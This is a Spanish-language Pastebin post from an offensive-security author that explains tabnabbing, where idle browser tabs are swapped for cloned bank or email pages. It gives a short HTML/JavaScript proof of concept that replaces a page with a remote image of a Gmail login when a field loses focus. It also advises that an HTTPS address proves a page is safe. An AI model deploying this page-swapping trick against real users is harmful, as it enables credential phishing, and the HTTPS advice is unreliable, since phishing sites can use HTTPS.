Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _______ _ _ _ _
- |__ __| | | | \ | | (_)
- | | __ _| |__ | \| | __ _ _ __ _ __ _ _ __ __ _
- | |/ _` | '_ \ | . ` |/ _` | '_ \| '_ \| | '_ \ / _` |
- | | (_| | |_) | | |\ | (_| | |_) | |_) | | | | | (_| |
- |_|\__,_|_.__/ |_| \_|\__,_| .__/| .__/|_|_| |_|\__, |
- | | | | __/ |
- _____ _ _ |_| __|_| _ |___/
- / ____| | | | / ____| | |
- | (___ | |__ ___ _ __| |_ | | ___ __| | ___
- \___ \| '_ \ / _ \| '__| __| | | / _ \ / _` |/ _ \
- ____) | | | | (_) | | | |_ | |___| (_) | (_| | __/
- |_____/|_| |_|\___/|_| \__| \_____\___/ \__,_|\___|
- Author: Jordan Diaz (aka Jbyte)
- REDBIRD - SEGURIDAD OFENSIVA
- El "tab napping" se aprovecha de los nuevos navegadores y su sistema de varias pestañas. En ellos, sólo hace falta abrir en una ventana el navegador, y se pueden abrir varias pestañas (pulsando la combinación Control T o simplemente asiendo click) para poder navegar en varias páginas a la vez.
- Este sistema reconoce qué pestañas están siendo usadas y cuales, aunque están abiertas, no han sido utilizadas en un rato. Estas últimas, cambian sin que nos demos cuenta a una de esas webs clonadas, y si tenemos la mala suerte de entrar en esa pestaña y meter nuestros datos bancarios, los delicuentes ya los tendrán para hacer con ellos lo que quieran.
- ¿Cómo funciona?
- Este sistema instala un código Java Script en nuestro navegador, que hace que la página buena, por ejemplo la del Banco Santander, cambia a una página clonada, sin que, a priori, nos demos cuenta, cuando la pestaña en la que se muestra la web legal del Banco Santander lleve un rato inactiva.
- ¿Cómo evitarlo?
- Podemos identificar si la web es segura o no observando la barra de direcciones. Si la URL empieza con una dirección HTTPS:// es segura.
- Siempre, y repetimos, SIEMPRE, hay que fijarse que la dirección de la página de nuestro banco o de una tienda en la que queramos comprar empieza de este modo, antes de dar nuestro número de tarjeta o nuestra contraseña. Es la manera de comprobar que la página está verificada y protegida de timos como éste o como el phising.
- Sencillo pero las prisas del día a día o simplemente los descuidos hacen que en ocasiones nos quedem
- short Code:
- <html>
- <head>
- <script type="text/javascript">
- function setFocus(){
- document.getElementById("surname").focus();
- }
- function sinfoco()
- {var pagina = 'http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png';
- //document.getElementById("searchBox").focus();
- //document.location.href=pagina;
- document.documentElement.innerHTML="<html><img src='http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png'></html>";
- }
- </script>
- </head>
- <body onload="setFocus();">
- <form>
- Name: <input type="text" id="name" size="30"><br />
- Surname: <input type="text" id="surname" size="30" onblur=sinfoco()>
- </form>
- </body>
- </html>
- Solo nos queda copiar el texto y guardarlo como un archivo html y listo, nos al cambiar de pesataña nos redirigira a una web con una imagen de gmai.
- FIN
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement